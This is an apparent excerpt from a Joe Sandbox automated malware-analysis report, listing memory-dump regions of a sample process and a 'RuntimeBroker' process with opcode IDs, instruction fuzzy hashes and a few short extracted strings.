                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 017d14c40ba880b0eee1840afbdc022076c034c6452677bd5af75aff0d9efb45
                                                                      • Instruction ID: 05914e670946050ee81f2e6267dc390faa3d39f80fbda2ebd62762426450c166
                                                                      • Opcode Fuzzy Hash: 017d14c40ba880b0eee1840afbdc022076c034c6452677bd5af75aff0d9efb45
                                                                      • Instruction Fuzzy Hash: B0213221F1ED0E4BEBB4F76884646B86292EF8C711F5602B5D42DD72F2ED38AE418740
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fa1c84d3c1e93889a146bb2f87c39e2c38db1e83d3056d97ec38a17a992c9152
                                                                      • Instruction ID: c39e591175b03d05ceddcc37a14799a6191e9886ffd12ae7c491854192474c3d
                                                                      • Opcode Fuzzy Hash: fa1c84d3c1e93889a146bb2f87c39e2c38db1e83d3056d97ec38a17a992c9152
                                                                      • Instruction Fuzzy Hash: B7012B11A4EAC50FD72A67B45C719A13FA0DF8B21030A01FAD095CB1E3CC5D19868751
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c642151ab11ae08a5717c81b0405263ec29e37f5b7e792c817e4fe5494642e2
                                                                      • Instruction ID: 952056a0aa3764fd3f56f86130b57d17c7fad738b239d96311f2e2b2ce5e5442
                                                                      • Opcode Fuzzy Hash: 2c642151ab11ae08a5717c81b0405263ec29e37f5b7e792c817e4fe5494642e2
                                                                      • Instruction Fuzzy Hash: 3111A535F1EA8D8FE722DFA8886019C7FB1EF55710F0645F7C054DB1A2D5386A458790
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • Opcode ID: 46032bed6468c8077b756c7bc0ac6740b1e5c1cd149772530fd01aac94e87016
                                                                      • Instruction ID: 11e8f6840c56b9950d008c9b54a51db137bbc57fa19dd7b59885ab10789689c0
                                                                      • Opcode Fuzzy Hash: 46032bed6468c8077b756c7bc0ac6740b1e5c1cd149772530fd01aac94e87016
                                                                      • Instruction Fuzzy Hash: 87C04C04F18C1E47F7597618443157E44929F48794F9544B8E41ED76CECD1C695206C7
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: ba6e37ca9a45537bbcdea9ebd158e69059ca973053a3aa372a6bcd614f8fb31a
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: ACB01200E67C0F02E42433FB0C520A470405F8C100FC30070D42D500A1985E12950282
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: bb6db4555ec8a96844f600108284c5dbe3dc6a4c4a6928bd76af170f331cd35b
                                                                      • Instruction ID: 3d574d97b2c9719f86ed7e5dbedaa552d132db20c9526dfaba96c0b5eb06fca4
                                                                      • Opcode Fuzzy Hash: bb6db4555ec8a96844f600108284c5dbe3dc6a4c4a6928bd76af170f331cd35b
                                                                      • Instruction Fuzzy Hash: 0C41D187F1853785E31E33FD792A9EC5B40CF8523DB0846B7E16E8A0D76C88648792E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 987dd181a8cdd13f62457be19cdb954f8380f9cdaec9037fbcb6519f014bd7f0
                                                                      • Instruction ID: c33e3324ba6e9312e4ee29d1e8dea5f2dbc87588a311d0feaa8dcedb8bcf34e2
                                                                      • Opcode Fuzzy Hash: 987dd181a8cdd13f62457be19cdb954f8380f9cdaec9037fbcb6519f014bd7f0
                                                                      • Instruction Fuzzy Hash: FEC2B331B1995E4FEBA8FB5884A1AB47392FFA8350F1545B9D01DC32D6DE34BD828780
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 22fc97bad1a21c30a7914685ff4878be168f83c63b7b659ab1c4a689ce1aae81
                                                                      • Instruction ID: 0ad6c52a3449cb40c40722200d391d7c9a9fb853e7515f6d1e4e99e3e30f433b
                                                                      • Opcode Fuzzy Hash: 22fc97bad1a21c30a7914685ff4878be168f83c63b7b659ab1c4a689ce1aae81
                                                                      • Instruction Fuzzy Hash: 6CB1CD61B2D69A0BE32DAB6C4CD20B473C1EB9A309B55877EC8DBC3457D92CE50782C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9
                                                                      • API String ID: 0-3426396564
                                                                      • Opcode ID: 95bd2d70263fadbb1f5d159e096fe91379546c1da031f0875cf2b402847db7e3
                                                                      • Instruction ID: 68ecfc92bb65c7e1269d229fedc20664105a2c118639b07c7c8855f942d9a511
                                                                      • Opcode Fuzzy Hash: 95bd2d70263fadbb1f5d159e096fe91379546c1da031f0875cf2b402847db7e3
                                                                      • Instruction Fuzzy Hash: C201442772EA6A8FC6016B7DFC506E8BB50EBC613679600FBC245CB5A2E110186FC7D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: eM_H
                                                                      • API String ID: 0-282742407
                                                                      • Opcode ID: 0585f31eb6789805ea1c7d1d1b8958d2afadd670af6c8d94422691f6a08816cc
                                                                      • Instruction ID: 4044a6af31262e3d9192b15425db74bc1f92b3460048312bcd45c7658d89adb4
                                                                      • Opcode Fuzzy Hash: 0585f31eb6789805ea1c7d1d1b8958d2afadd670af6c8d94422691f6a08816cc
                                                                      • Instruction Fuzzy Hash: 8A51E531B1CB084FEB58DB1CA85667577D1EB99720F14417EF48DC32A2DA35BC428B82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [
                                                                      • API String ID: 0-784033777
                                                                      • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction ID: ebe96405d0b4b11926bf1887cdb92ebaf3cd62a93d0602a52305c7d25b0faa3b
                                                                      • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction Fuzzy Hash: 60116031A1CB688FDB64DF18C40526AB7E1FB98711F16053ED489E3261CB34B9018B83
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction ID: bb7650356f7d5c5e58d64ea971e03f87f52e82c674cdeed2858ed7e798d392a4
                                                                      • Opcode Fuzzy Hash: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction Fuzzy Hash: 7D11BF6150F3C54FDB53A77488689A57FA0EF43611B0A81EFD0C5CF0B3DA69494ACB12
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 5cab46bbffd1190c9fbbd7b8ea6ad21cba0cd46f0e766dc4e7fe30dae0abbcc6
                                                                      • Instruction ID: fe2cbfad1581625b9cfff53e52da6bcbe9b6fed1f23e7998a17270866b1435f5
                                                                      • Opcode Fuzzy Hash: 5cab46bbffd1190c9fbbd7b8ea6ad21cba0cd46f0e766dc4e7fe30dae0abbcc6
                                                                      • Instruction Fuzzy Hash: 92E0923060A7C14FCB16AB748468455BFB0EF6720174A46EEC056CB1A3DB2DC886CB01
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction ID: 825d34e207d7b75df8fe4d01d6d004ee6a95eeaccaf4bf0af877a17fb57c0459
                                                                      • Opcode Fuzzy Hash: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction Fuzzy Hash: 2FE06D2164E3C04FCB16EB3888688557FA0AE6720174A42EEC086CF1A3EA2D8889C711
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction ID: d4c85a19c988f8ae481850d15cdfad4b3ea28baac6b7a44035ae6bb4b3e4069a
                                                                      • Opcode Fuzzy Hash: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction Fuzzy Hash: 86E06D6164E7C44FCB5AEB748869454BFA0EF6721174A42EFC045CF1A7EA2DC885C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction ID: b4a49f4f1ef1186964d0937bb0e67b9b0c1f0695dcb6b0cfbb6661a39f40ff14
                                                                      • Opcode Fuzzy Hash: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction Fuzzy Hash: 04E06D6164E7C44FC71AEA788869854BFA0EF6721174A52EFC045CF1A7EA2D8889C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 3714299f4265d16e45ac9a12386e70e97423550eb86f5f067117f3852a49c3b3
                                                                      • Instruction ID: 135b3fa46d31af2e61232207c28bccebfda58029da2436e9f3cb6aeb8a92358b
                                                                      • Opcode Fuzzy Hash: 3714299f4265d16e45ac9a12386e70e97423550eb86f5f067117f3852a49c3b3
                                                                      • Instruction Fuzzy Hash: 7CE0657160F7C44FC716A67488684547FA1EF6720174A41EFC086CF1A3DA1D8845C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
                                                                      • Instruction ID: fcaf63145801c42f6afee87650239952ccfd267057284dfa9507a20e85fb12cd
                                                                      • Opcode Fuzzy Hash: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
                                                                      • Instruction Fuzzy Hash: CDE0ED6154F3D44FCB16DB7488698557FB0AE6B21074B41DEC185CB1B3D619D949C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 6f48a9a80308f86f4229a9ad8f5e5ec023903ab9ee2c8189cea8e4f27d3b734b
                                                                      • Instruction ID: bce0304e481d2b3bbfc9e20c5e8c033dfd0450ece6d9b143f234d6e3b8b93a21
                                                                      • Opcode Fuzzy Hash: 6f48a9a80308f86f4229a9ad8f5e5ec023903ab9ee2c8189cea8e4f27d3b734b
                                                                      • Instruction Fuzzy Hash: CFE0127194F3C48FCB56EB7588658547FB0AE6761074B41EEC085CF1B3D62D9849C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 4df0ab70ae7f309628f2faeb7f6dcb5ebb956beb4ff421f67bf74f580f61ea40
                                                                      • Instruction ID: 19cf3b2479bac00445e6717740ed3d6f83370dffcb73bfc4efe64230e81bc516
                                                                      • Opcode Fuzzy Hash: 4df0ab70ae7f309628f2faeb7f6dcb5ebb956beb4ff421f67bf74f580f61ea40
                                                                      • Instruction Fuzzy Hash: A7E01A7154E3C44FCB06AB7488699553FA09E6B21178B41DEC08ACF1B3D62D8949C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 83dc0d97cbbc427e747160c5e42807c5c195f7ff0b624313fe927a8df981d17d
                                                                      • Instruction ID: c2d69d25213d0432d2159185ff618fdd2896ded8965f33a28b3759c8a94cd7f7
                                                                      • Opcode Fuzzy Hash: 83dc0d97cbbc427e747160c5e42807c5c195f7ff0b624313fe927a8df981d17d
                                                                      • Instruction Fuzzy Hash: 16E01A6154E3C04FCB06EB7884699553FA09E6721178B41EEC04ACF1B3D62D8949C701
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbf26c4e06806d87b075aa5f9b7e3f6927c5ee2882cb4e8600cd4b682d7def0d
                                                                      • Instruction ID: e790c313af229ccaaf76326c00d43e3a5980622acf3def36849a5dbe82db6448
                                                                      • Opcode Fuzzy Hash: dbf26c4e06806d87b075aa5f9b7e3f6927c5ee2882cb4e8600cd4b682d7def0d
                                                                      • Instruction Fuzzy Hash: 37A1A430B1891D4FDB58EF68C4A8AB977E1FF98314B5145BAD01DC32D6DF34A9428B81
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      • Opcode Fuzzy Hash: 595fd9dc68d37cc5d343033b8a2a0fe4daa7abed56c0c195b6aef102e90417d8
                                                                      • Instruction Fuzzy Hash: B9F0BE31A0450E8BFB18EB80C8619BD73A5FB54300F400239C4269B2E8DEB46A018780
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction ID: be2653dae989573074bf913477c8499db98a35f19379fc432810422f359cbcf1
                                                                      • Opcode Fuzzy Hash: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction Fuzzy Hash: 72E08C2160AB844FC70EA7288CA99503BB1EFAB21278A40DBC005CB6B3EA1DCC49C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b391616099f6d3fff0b7ec4eb00f564c313c61daa9f2895fc93ec336df0d011
                                                                      • Instruction ID: c688b0b9506d7e80dba1e2c702f3924708bc2e8db8a258bcfd3d8e2578293938
                                                                      • Opcode Fuzzy Hash: 9b391616099f6d3fff0b7ec4eb00f564c313c61daa9f2895fc93ec336df0d011
                                                                      • Instruction Fuzzy Hash: 4FF02230518A1C8FCF98DB48C495EE9B7F1FB68305F154599914AE72A0CB31AA80CF85
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba736035fa633c8ca825ff0cf86fb36d06e0121df7aab2ba7dc9bf295e1baaf4
                                                                      • Instruction ID: 7d77ad6cb2987bc77775083f8f66ba844faddb3fd44bbf9729ae6690ead2ed18
                                                                      • Opcode Fuzzy Hash: ba736035fa633c8ca825ff0cf86fb36d06e0121df7aab2ba7dc9bf295e1baaf4
                                                                      • Instruction Fuzzy Hash: EBE08C2164A7804FC30E66389CA98543BB1DFAB21278A41DBC041CB6B3EA2ECC89C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction ID: 7ceed153ac2f168313dbd501c589e6f9ddc9fd4547ae7362bfcf7f6e491dd0a7
                                                                      • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction Fuzzy Hash: E8E04F3270D80F96FB75A750C8705BB3692EBD8719B264239C02AD25A1DE6CA7068641
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction ID: 9f57dabdae326f99f93587561800b524ac45c405cfcda306ebea8823e06024e6
                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: 35E01271F0D11A56FFA4A794D8617F966A0DB58300F1110B8D50ED33D1CD38AF418645
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3c89a02c4191a3142e1c0e985e323deac79fb3db9ccaa47c497b739200f758cd
                                                                      • Instruction ID: 8b8c34f85137e0868dbb20e6eb0981472966af9f90bf3b0b39ec1eae5bb0345f
                                                                      • Opcode Fuzzy Hash: 3c89a02c4191a3142e1c0e985e323deac79fb3db9ccaa47c497b739200f758cd
                                                                      • Instruction Fuzzy Hash: 71E0127054F3C04FCB0AAB7488698543FB0AE6B21078F41EEC08ACF1B3E62D8949C701
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
